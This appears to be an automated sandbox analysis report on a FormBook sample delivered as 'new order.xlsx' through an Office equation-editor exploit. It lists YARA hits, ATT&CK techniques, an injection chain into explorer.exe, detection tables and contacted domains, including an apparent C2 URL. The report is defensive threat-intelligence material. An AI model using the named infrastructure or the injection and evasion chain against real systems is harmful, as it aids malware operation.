          Source: Yara matchFile source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information41Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobExtra Window Memory Injection1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 452636 Sample: new order.xlsx Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 39 www.legifo.com 2->39 57 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->57 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 12 other signatures 2->63 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 34 30 2->16         started        signatures3 process4 dnsIp5 47 103.155.80.130, 49167, 80 TWIDC-AS-APTWIDCLimitedHK unknown 11->47 33 C:\Users\user\AppData\Local\...\bin[1].exe, PE32 11->33 dropped 35 C:\Users\Public\vbc.exe, PE32 11->35 dropped 81 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->81 18 vbc.exe 11->18         started        37 C:\Users\user\Desktop\~$new order.xlsx, data 16->37 dropped file6 signatures7 process8 signatures9 49 Multi AV Scanner detection for dropped file 18->49 51 Machine Learning detection for dropped file 18->51 53 Tries to detect virtualization through RDTSC time measurements 18->53 55 Injects a PE file into a foreign processes 18->55 21 vbc.exe 18->21         started        process10 signatures11 65 Modifies the context of a thread in another process (thread injection) 21->65 67 Maps a DLL or memory area into another process 21->67 69 Sample uses process hollowing technique 21->69 71 Queues an APC in another process (thread injection) 21->71 24 explorer.exe 21->24 injected process12 dnsIp13 41 www.globaltradeview.com 199.59.242.153, 49169, 80 BODIS-NJUS United States 24->41 43 www.thinking-diversity.com 24->43 45 2 other IPs or domains 24->45 73 System process connects to network (likely due to code injection or exploit) 24->73 28 wlanext.exe 24->28         started        signatures14 process15 signatures16 75 Modifies the context of a thread in another process (thread injection) 28->75 77 Maps a DLL or memory area into another process 28->77 79 Tries to detect virtualization through RDTSC time measurements 28->79 31 cmd.exe 28->31         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          new order.xlsx30%VirustotalBrowse
          new order.xlsx28%ReversingLabsDocument-OLE.Exploit.CVE-2018-0802

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe32%ReversingLabsByteCode-MSIL.Trojan.Generic
          C:\Users\Public\vbc.exe32%ReversingLabsByteCode-MSIL.Trojan.Generic

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.vbc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.globaltradeview.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.google.com.br/0%Avira URL Cloudsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.google.com.tw/0%Avira URL Cloudsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%URL Reputationsafe
          http://buscar.ozu.es/0%URL Reputationsafe
          http://buscar.ozu.es/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://www.thinking-diversity.com/n84e/?m8ot=8pa4DPp09N0DbNR0&YP=KbrClequBVdtRHK/gZ2KmWZGYK0xt8ME2AlExBVUQacHPbAvPt6PKzpjA4rIGWPVOlDf0Q==0%Avira URL Cloudsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          thinking-diversity.com
          		34.102.136.180
          		truefalse
            		unknown
            www.globaltradeview.com
            		199.59.242.153
            		truetrueunknown
            www.legifo.com
            		52.58.78.16
            		truefalse
              		unknown
              www.thinking-diversity.com
              		unknown
              		unknowntrue
                		unknown
                www.compareionizers.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.thinking-diversity.com/n84e/?m8ot=8pa4DPp09N0DbNR0&YP=KbrClequBVdtRHK/gZ2KmWZGYK0xt8ME2AlExBVUQacHPbAvPt6PKzpjA4rIGWPVOlDf0Q==false
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.google.com.br/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://search.chol.com/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                    		high
                    http://www.mercadolivre.com.br/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://search.ebay.de/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                      		high
                      http://www.mtv.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                        		high
                        http://www.rambler.ru/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                          		high
                          http://www.nifty.com/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                            		high
                            http://www.dailymail.co.uk/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www3.fnac.com/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                              		high
                              http://buscar.ya.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                		high
                                http://search.yahoo.com/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                  		high
                                  http://www.iis.fhg.de/audioPAexplorer.exe, 00000008.00000000.2218367895.0000000004B50000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sogou.com/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                    		high
                                    http://asp.usatoday.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                      		high
                                      http://fr.search.yahoo.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                        		high
                                        http://rover.ebay.comexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                          		high
                                          http://in.search.yahoo.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                            		high
                                            http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                              		high
                                              http://search.ebay.in/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                		high
                                                http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://%s.comexplorer.exe, 00000008.00000000.2228808458.000000000A330000.00000008.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		low
                                                http://msk.afisha.ru/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  		high
                                                  http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.google.com.tw/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://search.rediff.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    		high
                                                    http://www.windows.com/pctv.explorer.exe, 00000008.00000000.2216707466.0000000003C40000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.ya.com/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        		high
                                                        http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://it.search.dada.net/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://search.naver.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          		high
                                                          http://www.google.ru/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            		high
                                                            http://search.hanafos.com/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.abril.com.br/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://search.daum.net/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              		high
                                                              http://search.naver.com/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                		high
                                                                http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.clarin.com/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  		high
                                                                  http://buscar.ozu.es/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://kr.search.yahoo.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    		high
                                                                    http://search.about.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      		high
                                                                      http://busca.igbusca.com.br/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.ask.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.priceminister.com/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.cjmall.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              		high
                                                                              http://search.centrum.cz/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                		high
                                                                                http://suche.t-online.de/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://www.google.it/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://search.auction.co.kr/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://www.ceneo.pl/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://www.amazon.de/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000008.00000000.2225535708.000000000861C000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://sads.myspace.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://google.pchome.com.tw/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://www.rambler.ru/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://uk.search.yahoo.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://espanol.search.yahoo.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.ozu.es/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://search.sify.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://openimage.interpark.com/interpark.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://search.ebay.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.gmarket.co.kr/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://search.nifty.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://searchresults.news.com.au/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://www.google.si/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.google.cz/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.soso.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.univision.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://search.ebay.it/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.asharqalawsat.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://busca.orange.es/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000008.00000000.2228808458.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://search.yahoo.co.jpexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://www.target.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://buscador.terra.es/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://search.orange.co.uk/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://www.iask.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://www.tesco.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://cgi.search.biglobe.ne.jp/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  http://search.seznam.cz/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    		high
